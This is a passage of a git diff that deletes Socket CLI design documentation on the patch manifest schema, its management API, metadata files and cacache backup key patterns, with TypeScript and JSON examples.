"1.0.0", - "patches": { ... }, - "policy": { - "alertThreshold": "high", - "blockOnCritical": true, - "autoApplyPatches": false, - "allowedLicenses": ["MIT", "Apache-2.0", "BSD-3-Clause"] - } -} -``` - -**Benefits**: -- Consistent CI behavior across team -- Policy as code (versioned, reviewed) -- Override Socket API defaults per-project - ---- - -### 5. Applied Overrides History - -**Problem**: Track when overrides were applied vs. just configured -**Solution**: Record override application - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "overrides": { ... }, - "appliedOverrides": { - "npm:lodash@4.17.20": { - "replacedWith": "npm:@socketregistry/lodash@4.17.21", - "appliedAt": "2025-01-14T12:00:00Z", - "reason": "Security hardening" - } - } -} -``` - -**Benefits**: -- Audit trail of package replacements -- Understand what changed and why -- Rollback information - ---- - -### 6. Metadata / Project Info - -**Problem**: Socket CLI needs project context -**Solution**: Store project metadata - -```json -{ - "version": "1.0.0", - "metadata": { - "projectName": "my-app", - "orgSlug": "my-company", - "lastScanAt": "2025-01-14T12:00:00Z", - "socketVersion": "1.1.25" - }, - "patches": { ... } -} -``` - -**Benefits**: -- Remember org slug (no need to pass --org every time) -- Track when project was last scanned -- Detect if manifest created with old CLI version - ---- - -### 7. Custom Scripts / Hooks - -**Problem**: Projects may need pre/post patch actions -**Solution**: Define lifecycle hooks - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "hooks": { - "prePatch": "npm run lint", - "postPatch": "npm test", - "preRestore": "npm run backup", - "postRestore": "npm install" - } -} -``` - -**Benefits**: -- Run tests after patching -- Rebuild after restore -- Project-specific workflows - ---- - -### 8. Dependencies Metadata - -**Problem**: Track which dependencies have known issues -**Solution**: Document dependency status - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "dependencies": { - "npm:lodash@4.17.20": { - "knownVulnerabilities": ["GHSA-xxxx-yyyy-zzzz"], - "patchAvailable": true, - "lastCheckedAt": "2025-01-14T12:00:00Z" - } - } -} -``` - -**Benefits**: -- Quick lookup of package status -- Avoid re-scanning on every run -- Show staleness (when last checked) - ---- - -### 9. Rollback Information - -**Problem**: Need to undo patches sometimes -**Solution**: Track patch history - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "history": [ - { - "action": "apply", - "purl": "npm:lodash@4.17.20", - "uuid": "abc-123", - "timestamp": "2025-01-14T12:00:00Z", - "appliedBy": "developer@example.com" - }, - { - "action": "remove", - "purl": "npm:lodash@4.17.20", - "uuid": "abc-123", - "timestamp": "2025-01-15T09:00:00Z", - "removedBy": "developer@example.com" - } - ] -} -``` - -**Benefits**: -- Audit trail of all patch operations -- Understand who made changes -- Debug patch issues - ---- - -## Recommended Initial Extensions - -For **Phase 1.2**, I recommend adding: - -### Minimal Schema - -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -**Just add version field for future compatibility.** - -### Enhanced Schema (Optional) - -```json -{ - "version": "1.0.0", - "metadata": { - "orgSlug": "my-company", - "createdAt": "2025-01-14T12:00:00Z", - "updatedAt": "2025-01-14T12:00:00Z" - }, - "patches": { ... } -} -``` - -**Add basic metadata for convenience.** - ---- - -## Integration with Existing Tools - -### npm/pnpm/yarn Overrides - -Socket manifest could **generate** package manager configs: - -```bash -# Read .socket/manifest.json overrides -socket sync overrides - -# Generates pnpm-lock.yaml overrides section -# Generates package.json pnpm.overrides -# Generates .yarnrc.yml resolutions -``` - -### Socket Registry Integration - -Projects using socket-registry could share override preferences: - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "registry": { - "prefer": "socket", - "packages": { - "lodash": "@socketregistry/lodash", - "minimatch": "@socketregistry/minimatch" - } - } -} -``` - ---- - -## What Should NOT Go in Manifest - -❌ **Developer-specific settings** -- Local file paths -- Personal API tokens -- Editor preferences - -→ These go in `~/.socketrc` or environment variables - -❌ **Large binary data** -- Patch tarballs -- Backup files -- Build artifacts - -→ These go in cacache or ignored directories - -❌ **Transient state** -- Current download progress -- Temporary locks -- Cache timestamps - -→ These go in memory or temp files - -❌ **Sensitive information** -- API keys -- Credentials -- Private URLs - -→ These go in `.env` or secrets management - ---- - -## Decision Framework - -**Should this go in manifest?** - -Questions to ask: -1. ✅ Should this be committed to git? -2. ✅ Should the whole team see it? -3. ✅ Is it project-specific (not developer-specific)? -4. ✅ Does it affect reproducible builds? -5. ✅ Is it human-readable JSON? - -If all "yes" → Consider adding to manifest - ---- - -## Example: Full Featured Manifest - -```json -{ - "version": "1.0.0", - "metadata": { - "projectName": "my-app", - "orgSlug": "my-company", - "createdAt": "2025-01-14T12:00:00Z", - "updatedAt": "2025-01-14T14:30:00Z" - }, - "patches": { - "npm:lodash@4.17.20": { - "uuid": "abc-123", - "exportedAt": "2025-01-14T12:00:00Z", - "files": { ... }, - "vulnerabilities": { ... }, - "description": "Fixes command injection", - "license": "MIT", - "tier": "free" - } - }, - "overrides": { - "minimatch": "npm:@socketregistry/minimatch@9.0.5" - }, - "ignored": { - "GHSA-false-positive-123": { - "reason": "Not applicable to our use case", - "ignoredBy": "security-team@example.com", - "ignoredAt": "2025-01-14T12:00:00Z", - "expiresAt": "2025-04-14T12:00:00Z" - } - }, - "policy": { - "alertThreshold": "high", - "blockOnCritical": true - } -} -``` - ---- - -## My Recommendation - -**Start simple, extend later:** - -### Phase 1.2 (Now) -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -### Phase 2 (Soon) -```json -{ - "version": "1.0.0", - "metadata": { - "orgSlug": "...", - "updatedAt": "..." - }, - "patches": { ... } -} -``` - -### Phase 3 (Future) -```json -{ - "version": "1.0.0", - "metadata": { ... }, - "patches": { ... }, - "overrides": { ... }, - "ignored": { ... } -} -``` - -**Rationale**: -- Version field enables future extensions -- Add features as they're needed -- Keep manifest focused on patches initially - ---- - -## Implementation Note - -Use **optional fields** with Zod: - -```typescript -export const PatchManifestSchema = z.object({ - version: z.string().default("1.0.0"), - metadata: z.object({ - orgSlug: z.string().optional(), - createdAt: z.string().optional(), - updatedAt: z.string().optional(), - }).optional(), - patches: z.record(z.string(), PatchRecordSchema), - overrides: z.record(z.string(), z.string()).optional(), - ignored: z.record(z.string(), IgnoredVulnerabilitySchema).optional(), -}) -``` - -This allows: -- Old manifests still valid (no version field) -- New features opt-in (optional) -- Graceful degradation diff --git a/docs/technical/manifest-management.md b/docs/technical/manifest-management.md deleted file mode 100644 index 277bd86f4..000000000 --- a/docs/technical/manifest-management.md +++ /dev/null @@ -1,556 +0,0 @@ -# Socket Manifest Management - -## Overview - -The manifest management system provides a complete API for managing `.socket/manifest.json`, the file that tracks all patches applied to a project. It lives in the project repository and should be committed to version control. - -## Implementation - -**Module**: `src/utils/manifest/patches/index.mts` - -### Core Features - -- **Zod schema validation** - Ensures manifest integrity -- **Version support** - Schema versioning for future migrations -- **Atomic writes** - Temp file + rename prevents corruption -- **Concurrent safety** - Operation queueing prevents race conditions -- **TypeScript types** - Full type safety with exported types - -## API Reference - -### Types - -```typescript -export type PatchFile = { - beforeHash: string // ssri format: sha256-base64 - afterHash: string // ssri format: sha256-base64 -} - -export type Vulnerability = { - cves: string[] // CVE IDs - summary: string // One-line description - severity: string // LOW | MEDIUM | HIGH | CRITICAL - description: string // Full explanation -} - -export type PatchRecord = { - uuid: string // UUID v4 - exportedAt: string // ISO 8601 timestamp - files: Record // Path → hash info - vulnerabilities: Record - description: string // Patch description - license: string // SPDX identifier - tier: string // "free" | "premium" -} - -export type PatchManifest = { - version?: string // Schema version (default: "1.0.0") - patches: Record // PURL → patch record -} -``` - -### Core Functions - -#### readManifest(cwd?) - -Read and validate the patch manifest. - -```typescript -const manifest = await readManifest() -console.log('Applied patches:', Object.keys(manifest.patches).length) -``` - -**Returns**: `PatchManifest` - Parsed and validated manifest, or empty manifest if file doesn't exist - -**Parameters**: -- `cwd?` - Working directory (defaults to `process.cwd()`) - -**Notes**: -- Returns empty manifest with version "1.0.0" if file doesn't exist -- Validates against Zod schema -- Throws on invalid JSON or schema violations - -#### writeManifest(manifest, cwd?) - -Write the patch manifest to disk with validation. - -```typescript -const manifest = await readManifest() -manifest.patches['npm:lodash@4.17.20'] = patchRecord -await writeManifest(manifest) -``` - -**Parameters**: -- `manifest` - Manifest to write -- `cwd?` - Working directory (defaults to `process.cwd()`) - -**Notes**: -- Validates before writing -- Uses atomic write (temp file + rename) -- Creates parent directory if needed -- Formats JSON with 2-space indentation - -#### addPatch(purl, patchRecord, cwd?) - -Add a patch to the manifest. - -```typescript -await addPatch('npm:lodash@4.17.20', { - uuid: '123e4567-e89b-12d3-a456-426614174000', - exportedAt: new Date().toISOString(), - files: { - 'node_modules/lodash/index.js': { - beforeHash: 'sha256-qUiQTy8...', - afterHash: 'sha256-9f8e7d6...', - }, - }, - vulnerabilities: { ... }, - description: 'Fixes command injection', - license: 'MIT', - tier: 'free' -}) -``` - -**Parameters**: -- `purl` - Package URL (e.g., "npm:lodash@4.17.20") -- `patchRecord` - Patch record to add -- `cwd?` - Working directory - -**Notes**: -- If patch already exists for this PURL, it will be replaced -- Operation is queued to prevent race conditions -- Creates manifest file if it doesn't exist - -#### removePatch(purl, cwd?) - -Remove a patch from the manifest. - -```typescript -const removed = await removePatch('npm:lodash@4.17.20') -if (removed) { - console.log('Patch removed from manifest') -} -``` - -**Returns**: `boolean` - True if patch was removed, false if it didn't exist - -**Parameters**: -- `purl` - Package URL to remove -- `cwd?` - Working directory - -#### getPatch(purl, cwd?) - -Get a specific patch record from the manifest. - -```typescript -const patch = await getPatch('npm:lodash@4.17.20') -if (patch) { - console.log('Patch UUID:', patch.uuid) - console.log('Files patched:', Object.keys(patch.files).length) -} -``` - -**Returns**: `PatchRecord | undefined` - Patch record or undefined if not found - -**Parameters**: -- `purl` - Package URL to query -- `cwd?` - Working directory - -#### listPatches(cwd?) - -List all PURLs that have patches applied. - -```typescript -const purls = await listPatches() -console.log('Applied patches:') -for (const purl of purls) { - console.log(` - ${purl}`) -} -``` - -**Returns**: `string[]` - Array of PURLs - -**Parameters**: -- `cwd?` - Working directory - -#### hasPatch(purl, cwd?) - -Check if a patch is applied for a specific package. - -```typescript -if (await hasPatch('npm:lodash@4.17.20')) { - console.log('Patch already applied') -} -``` - -**Returns**: `boolean` - True if patch is applied - -**Parameters**: -- `purl` - Package URL to check -- `cwd?` - Working directory - -#### getAllPatches(cwd?) - -Get all patch records from the manifest. - -```typescript -const patches = await getAllPatches() -for (const [purl, patch] of Object.entries(patches)) { - console.log(`${purl}: ${patch.description}`) -} -``` - -**Returns**: `Record` - Object mapping PURLs to patch records - -**Parameters**: -- `cwd?` - Working directory - -#### validateManifest(cwd?) - -Validate that the manifest file is valid. - -```typescript -if (!await validateManifest()) { - console.error('Manifest validation failed') -} -``` - -**Returns**: `boolean` - True if valid - -**Parameters**: -- `cwd?` - Working directory - -#### migrateHashes(cwd?) - -Detect legacy hash formats in the manifest. - -```typescript -const migrated = await migrateHashes() -console.log(`Found ${migrated} legacy hashes`) -``` - -**Returns**: `number` - Number of legacy hashes detected - -**Parameters**: -- `cwd?` - Working directory - -**Notes**: -- Currently only detects legacy `git-sha256-*` format -- Does not perform actual conversion (requires re-reading files) -- Logs warnings for each legacy hash found - -## Manifest File Format - -### Location - -`.socket/manifest.json` (in project root) - -### Schema - -```json -{ - "version": "1.0.0", - "patches": { - "": { - "uuid": "", - "exportedAt": "", - "files": { - "": { - "beforeHash": "sha256-...", - "afterHash": "sha256-..." - } - }, - "vulnerabilities": { - "": { - "cves": ["CVE-..."], - "summary": "...", - "severity": "HIGH", - "description": "..." - } - }, - "description": "...", - "license": "MIT", - "tier": "free" - } - } -} -``` - -### Complete Example - -```json -{ - "version": "1.0.0", - "patches": { - "npm:lodash@4.17.20": { - "uuid": "123e4567-e89b-12d3-a456-426614174000", - "exportedAt": "2025-01-14T12:00:00Z", - "files": { - "node_modules/lodash/lodash.js": { - "beforeHash": "sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=", - "afterHash": "sha256-9f8e7d6c5b4a3210fedcba9876543210abcdef12345=" - }, - "node_modules/lodash/package.json": { - "beforeHash": "sha256-abc123def456...", - "afterHash": "sha256-xyz789ghi012..." - } - }, - "vulnerabilities": { - "GHSA-jrhj-2j3q-xf3v": { - "cves": ["CVE-2021-23337"], - "summary": "Command injection in lodash", - "severity": "HIGH", - "description": "Lodash versions prior to 4.17.21 are vulnerable..." - } - }, - "description": "Fixes command injection vulnerability in template function", - "license": "MIT", - "tier": "free" - } - } -} -``` - -## Concurrency Safety - -The manifest management system handles concurrent operations safely: - -- **Operation queueing**: All write operations are queued per working directory -- **Atomic reads**: Manifest is re-read before each update -- **No race conditions**: Promise chaining ensures correct ordering - -```typescript -// Safe to call concurrently - operations will be queued -await Promise.all([ - addPatch('npm:lodash@4.17.20', patch1), - addPatch('npm:express@4.17.1', patch2), - removePatch('npm:minimatch@3.0.4'), -]) -``` - -### Implementation Details - -```typescript -// Operation queue to ensure sequential manifest writes -const manifestOperations = new Map>() - -async function queueOperation( - cwd: string, - operation: () => Promise, -): Promise { - const key = cwd || process.cwd() - const previousOperation = manifestOperations.get(key) || Promise.resolve() - - const currentOperation = previousOperation.then( - () => operation(), - () => operation(), // Run even if previous failed - ) - - manifestOperations.set(key, currentOperation) - - try { - return await currentOperation - } finally { - if (manifestOperations.get(key) === currentOperation) { - manifestOperations.delete(key) - } - } -} -``` - -## Usage Examples - -### Complete Patch Flow - -```typescript -import { - addPatch, - getPatch, - hasPatch, - removePatch, -} from './utils/manifest/patches/index.mts' - -const purl = 'npm:lodash@4.17.20' - -// Check if patch already applied -if (await hasPatch(purl)) { - console.log('Patch already applied') - return -} - -// Apply patch -await addPatch(purl, { - uuid: '123e4567-e89b-12d3-a456-426614174000', - exportedAt: new Date().toISOString(), - files: { ... }, - vulnerabilities: { ... }, - description: 'Fixes command injection', - license: 'MIT', - tier: 'free' -}) - -console.log('Patch applied successfully') - -// Later: remove patch -const removed = await removePatch(purl) -if (removed) { - console.log('Patch removed') -} -``` - -### List All Patches - -```typescript -import { listPatches, getPatch } from './utils/manifest/patches/index.mts' - -const purls = await listPatches() - -console.log(`Found ${purls.length} applied patches:\n`) - -for (const purl of purls) { - const patch = await getPatch(purl) - console.log(`${purl}:`) - console.log(` UUID: ${patch!.uuid}`) - console.log(` Description: ${patch!.description}`) - console.log(` Files: ${Object.keys(patch!.files).length}`) - console.log(` Vulnerabilities: ${Object.keys(patch!.vulnerabilities).length}`) - console.log() -} -``` - -### Validate Manifest - -```typescript -import { validateManifest } from './utils/manifest/patches/index.mts' - -if (!await validateManifest()) { - console.error('Manifest validation failed!') - console.error('Please check .socket/manifest.json for errors') - process.exit(1) -} - -console.log('Manifest is valid') -``` - -### Detect Legacy Hashes - -```typescript -import { migrateHashes } from './utils/manifest/patches/index.mts' - -const legacyCount = await migrateHashes() - -if (legacyCount > 0) { - console.warn(`Found ${legacyCount} legacy hash format(s)`) - console.warn('Consider re-applying patches to use current ssri format') -} -``` - -## Error Handling - -Functions follow consistent error handling patterns: - -```typescript -// Returns undefined for missing data -const patch = await getPatch('non-existent-purl') -// patch === undefined - -// Returns false for failed operations -const removed = await removePatch('non-existent-purl') -// removed === false - -// Throws for filesystem errors, validation errors, etc. -try { - await writeManifest(invalidManifest) -} catch (error) { - console.error('Failed to write manifest:', error.message) -} -``` - -## Testing - -**Test suite**: `src/utils/manifest/patches/index.test.mts` -**Coverage**: 37 tests covering all core functionality - -Run tests: -```bash -pnpm exec vitest run src/utils/manifest/patches/index.test.mts -``` - -### Test Coverage - -- **readManifest**: 5 tests (missing file, existing file, defaults, validation) -- **writeManifest**: 5 tests (creation, directories, validation, formatting, overwrite) -- **addPatch**: 4 tests (empty manifest, multiple patches, replacement, creation) -- **removePatch**: 3 tests (existing, non-existent, selective) -- **getPatch**: 3 tests (existing, non-existent, multiple) -- **listPatches**: 3 tests (empty, multiple, after removal) -- **hasPatch**: 3 tests (existing, non-existent, after removal) -- **getAllPatches**: 2 tests (empty, multiple) -- **migrateHashes**: 3 tests (no legacy, legacy detection, empty) -- **validateManifest**: 4 tests (valid, non-existent, invalid, structure) -- **concurrent operations**: 2 tests (multiple adds, mixed operations) - -## Schema Versioning - -The manifest includes a `version` field to support future schema migrations: - -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -### Current Version: 1.0.0 - -- Initial schema with PURL-keyed patches -- Each patch has: uuid, exportedAt, files, vulnerabilities, description, license, tier -- File hashes in ssri format (sha256-base64) - -### Future Versions - -When the schema changes, increment the version and add migration logic: - -```typescript -const manifest = await readManifest() - -if (manifest.version !== CURRENT_VERSION) { - // Migration logic here - manifest = await migrateManifest(manifest) -} -``` - -See [socket-manifest-extensions.md](./socket-manifest-extensions.md) for proposed future extensions. - -## Best Practices - -1. **Always use the API** - Don't manually edit `.socket/manifest.json` -2. **Commit the manifest** - It's the source of truth for your team -3. **Validate after changes** - Use `validateManifest()` to catch errors -4. **Use ssri hashes** - New patches should use sha256-base64 format -5. **Concurrent operations** - The API handles queueing automatically - -## Integration with Backup System - -The manifest management system works alongside the backup system: - -| Aspect | Manifest | Backup Metadata | -|--------|----------|-----------------| -| **Location** | `.socket/manifest.json` | `~/.socket/_patches/manifests/.json` | -| **Committed** | Yes (in git) | No (local only) | -| **Purpose** | Patch records | Backup metadata | -| **Scope** | All patches | Single patch | -| **Contains** | Vulnerability info | Backup file info | - -**Workflow**: -1. Create backup using `patch-backup.mts` → local backup metadata -2. Add patch using `patch-manifest.mts` → committed manifest -3. Team members clone repo → manifest is shared -4. Restore backup using `patch-backup.mts` → uses local backup metadata - -## Related Documentation - -- [Socket Manifest Format](./socket-manifest-format.md) - Detailed format specification -- [Socket Manifest Extensions](./socket-manifest-extensions.md) - Proposed extensions -- [Patch Backup System](./patch-backup-system.md) - Backup/restore functionality -- [Socket Patch Implementation Plan](./socket-patch-implementation-plan.md) - Overall plan diff --git a/docs/technical/metadata-files.md b/docs/technical/metadata-files.md deleted file mode 100644 index 889a6b319..000000000 --- a/docs/technical/metadata-files.md +++ /dev/null @@ -1,233 +0,0 @@ -# Why We Need Metadata Files (Not Just Cacache) - -## The Question - -**Why can't we just glob cacache keys like `socket:patch:backup:abc-123:*` to find all backups for a patch?** - -## The Answer: Keys Are Cryptographically Hashed - -### What You Might Expect (But Doesn't Happen) - -``` -~/.socket/_cacache/keys/ -├── socket:patch:backup:abc-123:hash1 -├── socket:patch:backup:abc-123:hash2 -├── socket:patch:backup:abc-123:hash3 -└── socket:patch:backup:xyz-789:hash1 -``` - -Then you could: `ls ~/.socket/_cacache/keys/socket:patch:backup:abc-123:*` - -### What Actually Happens - -Cacache **hashes each key** to create a file path: - -``` -Key: "socket:patch:backup:abc-123:hash1" - ↓ SHA-256 hash - "f9a050c918ad397764136710465e0b51fbde7d5f" - ↓ Bucket by first 4 chars -Path: index-v5/f9/a0/50c918ad397764136710465e0b51fbde7d5f -``` - -``` -Key: "socket:patch:backup:abc-123:hash2" - ↓ SHA-256 hash (COMPLETELY DIFFERENT) - "a43f91b2c83af49176d8e9f103bd2652" - ↓ Bucket by first 4 chars -Path: index-v5/a4/3f/91b2c83af49176d8e9f103bd2652 -``` - -**Result**: Keys with similar strings produce completely unrelated file paths! - -### Actual Disk Structure - -``` -~/.socket/_cacache/ -├── index-v5/ -│ ├── f9/a0/50c918ad... ← contains key "socket:patch:backup:abc-123:hash1" -│ ├── a4/3f/91b2c83a... ← contains key "socket:patch:backup:abc-123:hash2" -│ ├── 7e/22/e53b1010... ← contains key "socket:patch:backup:abc-123:hash3" -│ └── d6/18/92f5b24c... ← contains key "socket:patch:backup:xyz-789:hash1" -└── content-v2/ - └── sha256/... -``` - -**You cannot glob these paths!** They're random with respect to the key string. - -## Why Cacache Does This - -### Design Goals: -1. **Scale to millions of entries** - Hash bucketing prevents huge directories -2. **Handle special characters** - Keys can have `/`, `:`, `?`, etc. - filesystem unsafe -3. **O(1) lookups** - Hash key → file path directly -4. **Atomic operations** - Write to temp, rename (filesystem atomic operation) -5. **Deduplication** - Content stored by hash, not by key - -### Trade-off: -- ✅ Fast exact key lookup: `O(1)` -- ❌ Pattern matching: `O(n)` - must scan all entries - -## How to Find Keys: cacache.ls() - -Cacache provides `cacache.ls()` but it's **expensive**: - -```typescript -import cacache from 'cacache' - -// This reads EVERY index file in the cache! -const allEntries = await cacache.ls('~/.socket/_cacache') -// Returns: { "key1": {...}, "key2": {...}, ... "keyN": {...} } - -// Filter in memory -const matchingKeys = Object.keys(allEntries) - .filter(key => key.startsWith('socket:patch:backup:abc-123:')) - -// For a cache with 10,000 entries, this reads 10,000 index files -// Just to find 3 keys for one patch! -``` - -**Performance**: -- 100 cache entries → Read 100 files to find 3 matches -- 1,000 cache entries → Read 1,000 files to find 3 matches -- 10,000 cache entries → Read 10,000 files to find 3 matches - -**This is O(n) where n = total cache size!** - -## Solution: Metadata Files - -Store a **small index file per patch**: - -### Metadata File: `~/.socket/_patches/manifests/abc-123.json` - -```json -{ - "uuid": "abc-123", - "appliedAt": "2025-01-14T12:00:00Z", - "files": { - "node_modules/lodash/index.js": { - "integrity": "sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=", - "size": 12345 - }, - "node_modules/lodash/package.json": { - "integrity": "sha256-abc123...", - "size": 678 - } - } -} -``` - -### Operations Now: - -**List backups for patch**: -```typescript -// O(1) - Read one small JSON file -const metadata = JSON.parse( - await fs.readFile(`~/.socket/_patches/manifests/${uuid}.json`) -) -const filePaths = Object.keys(metadata.files) -// Result: ["node_modules/lodash/index.js", "node_modules/lodash/package.json"] -``` - -**Restore all backups**: -```typescript -// O(k) where k = files in this patch (not total cache size!) -for (const [path, info] of Object.entries(metadata.files)) { - const key = `socket:patch:backup:${uuid}:${hashPath(path)}` - const entry = await cacache.get(cacheDir, key, { - integrity: info.integrity // Verify on retrieval - }) - await fs.writeFile(path, entry.data) -} -``` - -**Cleanup patch**: -```typescript -// O(k) - Only delete this patch's entries -for (const path of Object.keys(metadata.files)) { - await cacache.rm.entry(cacheDir, `socket:patch:backup:${uuid}:${hashPath(path)}`) -} -await fs.unlink(`~/.socket/_patches/manifests/${uuid}.json`) -``` - -## Comparison - -| Operation | Without Metadata | With Metadata | -|-----------|------------------|---------------| -| List files for patch | O(n) - scan entire cache | O(1) - read one JSON file | -| Restore patch | O(n) - scan to find keys | O(k) - k = files in patch | -| Cleanup patch | O(n) - scan to find keys | O(k) - k = files in patch | -| Storage overhead | 0 bytes | ~1KB per patch | - -**Example**: Cache with 10,000 entries, restoring patch with 3 files: -- Without metadata: Read 10,000 index files -- With metadata: Read 1 JSON file + 3 cache entries - -## Additional Benefits of Metadata Files - -1. **Human-readable**: `cat ~/.socket/_patches/manifests/abc-123.json` -2. **Debuggable**: Easy to inspect what's backed up -3. **Browsable**: `ls ~/.socket/_patches/manifests/` shows all patches -4. **Grep-able**: `grep "lodash" ~/.socket/_patches/manifests/*.json` -5. **No race conditions**: Each patch has its own file -6. **Backup-friendly**: Small files, easy to sync/backup - -## Could We Use a Different Cacache Structure? - -### Option: Store metadata in cacache itself - -```typescript -// Metadata as cacache entry -await cacache.put(cacheDir, `socket:patch:meta:${uuid}`, JSON.stringify(metadata)) -``` - -**Still can't glob!** Same problem: -- `socket:patch:meta:abc-123` → hashed to random path -- `socket:patch:meta:xyz-789` → hashed to different random path -- Still need to scan entire cache to find all metadata entries - -### Option: Use SQLite for index - -```sql -CREATE TABLE patch_metadata ( - uuid TEXT PRIMARY KEY, - metadata JSON -); -``` - -**Pros**: Fast queries, proper indexes -**Cons**: -- More complex (need to manage database) -- Concurrent access requires locking -- Not the npm ecosystem standard -- Overkill for simple lookup table - -## Conclusion - -### Why 3 Storage Types: - -1. **Metadata** (filesystem JSON): - - Small index files (~1KB each) - - Fast O(1) lookups by UUID - - Human-readable and debuggable - - One file per patch - -2. **Cacache index** (hashed): - - Key → content integrity mapping - - Handled automatically by cacache - - Optimized for exact key lookups - -3. **Cacache content** (hashed by integrity): - - Actual file contents - - Deduplicated automatically - - Integrity verified on retrieval - -### The Architecture Makes Sense: - -✅ **Metadata** = Query layer (what we want to find) -✅ **Cacache** = Storage layer (where content lives) - -**Total cost**: ~1KB per patch for metadata -**Performance gain**: O(n) → O(1) for all patch operations - -This is the standard pattern used throughout the npm ecosystem! diff --git a/docs/technical/patch-cacache.md b/docs/technical/patch-cacache.md deleted file mode 100644 index b781bd3f2..000000000 --- a/docs/technical/patch-cacache.md +++ /dev/null @@ -1,366 +0,0 @@ -# Patch Cacache Key Patterns - -## Overview - -Socket patch system uses content-addressable caching via `cacache` and `ssri` for storing backups and downloads. - -## Using ssri Library - -We use the `ssri` package (pinned at v12.0.0) for all hash operations, following patterns from `pacote` and `cacache`. - -### Key ssri Functions - -```typescript -import ssri from 'ssri' - -// Compute integrity from data -const integrity = ssri.fromData(buffer, { algorithms: ['sha256'] }) -integrity.toString() // 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' - -// Validate data against integrity -const isValid = ssri.checkData(buffer, 'sha256-...') -// Returns Integrity object if valid, false if invalid - -// Parse integrity string -const parsed = ssri.parse('sha256-...') -parsed.hexDigest() // Get hex format of hash - -// Convert hex to ssri (e.g., from npm dist.shasum) -const fromHex = ssri.fromHex('abc123...', 'sha1') -fromHex.toString() // 'sha1-...' -``` - -## Cacache Key Patterns - -### 1. Backup Storage Pattern - -**Format**: `socket:patch:backup::` - -**Example**: -``` -socket:patch:backup:123e4567-e89b-12d3-a456-426614174000:a1b2c3d4e5f6g7h8 -``` - -**Usage**: -```typescript -import { put, get } from '@socketsecurity/registry/lib/cacache' -import ssri from 'ssri' -import crypto from 'node:crypto' - -// Hash the file path (for key uniqueness) -function hashFilePath(filePath: string): string { - return crypto.createHash('sha256') - .update(filePath) - .digest('hex') - .slice(0, 16) // 16 chars sufficient -} - -// Store backup -async function storeBackup( - uuid: string, - filePath: string, - content: Buffer -): Promise { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - - // Compute integrity using ssri - const integrity = ssri.fromData(content, { algorithms: ['sha256'] }) - - const result = await put(key, content, { - integrity: integrity.toString(), // Pass ssri string to cacache - metadata: { - originalPath: filePath, - uuid, - backedUpAt: new Date().toISOString() - } - }) - - // result.integrity is an ssri Integrity object - return result.integrity.toString() // 'sha256-...' -} - -// Retrieve backup -async function retrieveBackup( - uuid: string, - filePath: string -): Promise { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - - const entry = await get(key) - - // entry.integrity is the ssri string - // entry.data is the Buffer - // Cacache automatically validates integrity when retrieving - - return entry.data -} - -// Retrieve with explicit integrity check -async function retrieveBackupWithIntegrity( - uuid: string, - filePath: string, - expectedIntegrity: string -): Promise { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - - // Pass integrity option to cacache.get - // Will throw if integrity doesn't match - const entry = await get(key, { - integrity: expectedIntegrity - }) - - return entry.data -} -``` - -### 2. Patch Download Pattern - -**Format**: `socket:patch:download:` - -**Example**: -``` -socket:patch:download:123e4567-e89b-12d3-a456-426614174000 -``` - -**Usage**: -```typescript -import { put, get, safeGet } from '@socketsecurity/registry/lib/cacache' -import ssri from 'ssri' - -// Store downloaded patch tarball -async function cachePatchDownload( - uuid: string, - tarball: Buffer, - expectedIntegrity?: string -): Promise { - const key = `socket:patch:download:${uuid}` - - // Compute integrity if not provided - const integrity = expectedIntegrity - ? ssri.parse(expectedIntegrity) - : ssri.fromData(tarball, { algorithms: ['sha512'] }) - - const result = await put(key, tarball, { - integrity: integrity.toString(), - metadata: { - uuid, - downloadedAt: new Date().toISOString() - } - }) - - return result.integrity.toString() -} - -// Retrieve cached patch (avoid re-download) -async function getCachedPatch( - uuid: string -): Promise { - const key = `socket:patch:download:${uuid}` - - // Use safeGet to avoid throwing if not cached - const entry = await safeGet(key) - - return entry?.data -} - -// Retrieve with integrity verification -async function getCachedPatchWithIntegrity( - uuid: string, - expectedIntegrity: string -): Promise { - const key = `socket:patch:download:${uuid}` - - try { - const entry = await get(key, { - integrity: expectedIntegrity - }) - return entry.data - } catch { - // Not found or integrity mismatch - return undefined - } -} -``` - -## Metadata Storage - -Patch metadata is stored in filesystem (NOT cacache): - -**Location**: `~/.socket/_patches/manifests/.json` - -**Schema**: -```typescript -interface PatchBackupMetadata { - uuid: string - patchedAt: string // ISO timestamp - backups: Record -} -``` - -**Example**: -```json -{ - "uuid": "123e4567-e89b-12d3-a456-426614174000", - "patchedAt": "2025-01-14T12:00:00Z", - "backups": { - "node_modules/lodash/index.js": { - "hash": "sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=", - "size": 12345, - "backedUpAt": "2025-01-14T12:00:00Z", - "originalPath": "node_modules/lodash/index.js" - } - } -} -``` - -## Complete Example: Backup and Restore Flow - -```typescript -import { put, get, remove } from '@socketsecurity/registry/lib/cacache' -import { promises as fs } from 'node:fs' -import { join } from 'node:path' -import ssri from 'ssri' -import crypto from 'node:crypto' - -// Helper to hash file paths -function hashFilePath(filePath: string): string { - return crypto.createHash('sha256') - .update(filePath) - .digest('hex') - .slice(0, 16) -} - -// Helper to get metadata file path -function getMetadataPath(uuid: string): string { - const socketHome = process.env.HOME + '/.socket' - return join(socketHome, '_patches', 'manifests', `${uuid}.json`) -} - -// Create backup before patching -async function createBackup( - uuid: string, - filePath: string -): Promise<{ hash: string; size: number }> { - // Read original file - const content = await fs.readFile(filePath) - - // Compute integrity using ssri - const integrity = ssri.fromData(content, { algorithms: ['sha256'] }) - const hash = integrity.toString() - - // Store in cacache - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - await put(key, content, { - integrity: hash, - metadata: { - originalPath: filePath, - 